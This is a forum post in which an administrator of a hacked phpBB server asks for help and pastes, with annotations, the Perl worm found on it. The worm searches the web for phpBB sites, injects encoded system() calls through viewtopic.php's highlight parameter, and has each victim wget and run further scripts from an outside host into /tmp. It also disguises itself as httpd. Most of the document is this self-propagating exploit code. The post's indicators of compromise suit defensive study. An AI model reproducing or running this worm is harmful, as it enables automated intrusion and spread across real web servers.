Dear All,
**** Please excuse me if this was not posted to the correct category ****
My phpBB installation (/var/www/html/phpBB2, running on Fedora Core 3) was wrongly left world-writable (mode 777) and has been attacked from a host with the IP address
81.196.20.134.
The scripts /tmp/.666 and /tmp/.lick are being invoked continuously; they appear to be launched through phpBB itself (the lick.txt script below injects a `system()` call into the `highlight` parameter of viewtopic.php to run `perl /tmp/.lick` on the target).
This results in a substantial number of defunct (zombie) `sh` processes.
I would like expert advice on the following:
1) How is it being invoked?
2) How do I stop it?
3) So far I have only denied that IP address access to /var/www/html via .htaccess. (Note that the script below finds new targets through search-engine queries from every host it infects and then installs a copy of itself there, so the attacking IP is most likely just another compromised server; an IP-based deny alone will probably not prevent re-infection.)
Mathew
------------------- lick.txt -------------------------
#### Nu exista patch pentru prostia umana (Romanian: "there is no patch for human stupidity") #####
########### Romania #########################
###### Crash@WhiteHat.Cc ######
use strict;
use IO::Socket;
use IO::Handle;
# Disguise the process: $0 (the name shown by ps) is overwritten with
# "/usr/sbin/httpd" padded with NUL bytes, so the bot looks like an Apache
# worker to an administrator inspecting the process list.
my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
# Fork once; both parent and child continue past this point. $pid is never
# read anywhere in this listing, so the only effect is doubling the number
# of running copies.
my $pid=fork;
# Forward declarations with prototypes. remote() is declared here but is not
# defined anywhere in this listing.
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
# Discover targets: ask search.msn.com for pages that look like phpBB
# viewtopic.php threads and return the outbound links from the result page.
# Takes no arguments; returns a list of "host/path" strings (scheme stripped
# by the capture in the regex below).
sub fetch(){
# Random padding appended to the search term, and a random result offset,
# so that repeated calls return different result pages.
my $rnd=(int(rand(9999)));
my $s= (int(rand(1000)));
if ($rnd>1000) { $s= (int(rand(100)))}
# URL-encoded search strings ("dorks") that match phpBB 2.x topic pages.
my @str=(
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22",
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22+topic+777",
"viewtopic.php%3Ft",
"%22View+next+topic%22",
"%22View+previous+topic%22",
"viewtopic.php+%22Log+in+to+check+your+private+messages%22",
"%22Powered+by+phpBB%22+v-i-e-w-t-o-p-i-c-.-p-h-p",
"%22P-o-w-e-r-e-d+b-y+p-h-p-B-B%22",
"viewtopic.php+%22by+phpBB+2001%22",
"viewtopic.php+%22by+phpBB+2000%22",
"viewtopic.php+%22by+phpBB+2002%22",
"viewtopic.php+by+phpBB+2003%22",
"viewtopic.php+%22by+phpBB+2004%22",
"%22ALEKS+HACKED+YOUR+SYSTEM%22",
"viewtopic.php+%22by+phpBB+2005%22",
"viewtopic.php+%22by+phpBB+2006%22",
"intitle%3A%22%3A%3A+View+topic%22",
"viewtopic.php+%22+phpBB+Group%22",
"%22topic.php%3Ft%3D%22",
"%22%3A%3A+View+topic%22",
);
# Pick one dork at random (the float from rand() is truncated by the array
# subscript) and append the random number and the result offset.
my $query="search.msn.com/results.aspx?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&first=$s";
my @lst=();
my $page = http_query($query);
# Collect every http:// link in the result page, except links that point
# back at the search engine itself (msn/cache/hotmail).
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/msn|cache|hotmail/){
push (@lst,$1);
}
}
return (@lst);
}
# Minimal HTTP client: fetch $url (with or without a leading http://) over a
# raw TCP socket on port 80 and return the whole response (status line,
# headers and body) joined into one string. Returns "" when the connection
# fails or the 10-second alarm fires; all errors are swallowed (the eval's
# $@ is never inspected).
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
# Split the URL into host (everything up to the first "/") and path.
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
# NOTE: $host is interpolated into the pattern unescaped, so its dots match
# any character; only the first occurrence is removed.
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
# The SIGALRM handler dies inside the eval, abandoning the request after 10 s.
local $SIG{ALRM} = sub { die "1";};
alarm 10;
# "or return" leaves the eval block, not the sub, so $page stays "".
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
# HTTP/1.0 request with a spoofed browser User-Agent; the single space after
# the blank line is sent as a one-byte body.
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
# Slurp the whole response; "@r" joins the lines with a space ($").
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
# Turn an arbitrary string into PHP code that rebuilds it without quotes or
# spaces: every character becomes chr(NN), and the pieces are joined with
# %252E, which double-URL-decodes (%25 -> %, then %2E -> .) to PHP's "."
# concatenation operator. The trailing separator is stripped. This is how
# the shell commands in the main loop are smuggled through the viewtopic.php
# "highlight" parameter without any characters the filter would reject.
sub encode($) {
my $s = shift;
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
$s =~ s/%252E$//;
return $s;
}
# Main loop: for one hour, pull candidate phpBB URLs from the search engine,
# test each one for remote command execution through the "highlight"
# parameter of viewtopic.php, and on success make the target download and
# run a copy of this script (/tmp/.lick) plus a second script (/tmp/.666,
# contents not shown in this listing).
#
# Indicators an administrator can check for, all taken from this listing:
#   - the files /tmp/.lick and /tmp/.666, and perl processes whose name in
#     ps reads "/usr/sbin/httpd" (see the $0 assignment at the top);
#   - requests on viewtopic.php containing "highlight=%2527%252Esystem("
#     in the web server access log;
#   - the marker string jSVowMsd in responses, and outbound connections to
#     search.msn.com and to the download host named in the wget commands.
#
# Daemonize: the parent exits and the forked child carries on in the
# background (reparented to init); the eval ignores a failed fork. Combined
# with the fork at the top of the file, two background copies survive.
eval {fork and exit;};
# First command-line argument; captured but never used in this listing.
my $iam=$ARGV[0];
# Despite the name, the run time is one hour (3600 s), not one day.
my $oneday=time+3600;
my $page="";
my @urls;
my $url;
while(time<$oneday){
@urls=fetch();
foreach $url (@urls) {
# Only topic pages are of interest.
if ($url !~ /viewtopic.php/) {next;}
# Trim to ".../viewtopic.php?t=N" or "?p=N". The character class [t|p]
# also admits a literal "|", which is almost certainly unintended.
$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
# Probe: append '.system(<encoded cmd>).' to the highlight parameter
# (%2527 and %252E are the doubly URL-encoded quote and dot); the probe
# command merely prints a marker string.
my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
# Marker echoed back in the page => the target executed the command.
if ( $page =~ /jSVowMsd/ ){
$url =~ s/&highlight.*//;
# $upload is computed here but never used.
my $upload=$url;
$upload =~ s/viewtopic.*//;
# Stage 1: have the target fetch a copy of this script and run it
# (self-propagation). The line break inside the string literal is most
# likely a wrapping artefact of the post; as written, the newline would be
# encoded and sent along with the rest of the command.
$cmd="wget
http://lakexxx.go.ro/xpl.txt -O /tmp/.lick;perl /tmp/.lick"; # set cmd
$cmd=encode("$cmd"); # set cmd
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
# Stage 2: fetch the second script as /tmp/.666, run it and touch the file.
$cmd="wget
http://lakexxx.go.ro/bot.txt -O /tmp/.666;perl /tmp/.666;touch /tmp/.666";
$cmd=encode("$cmd"); # set cmd
$url =~ s/&highlight.*//;
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
}
}
}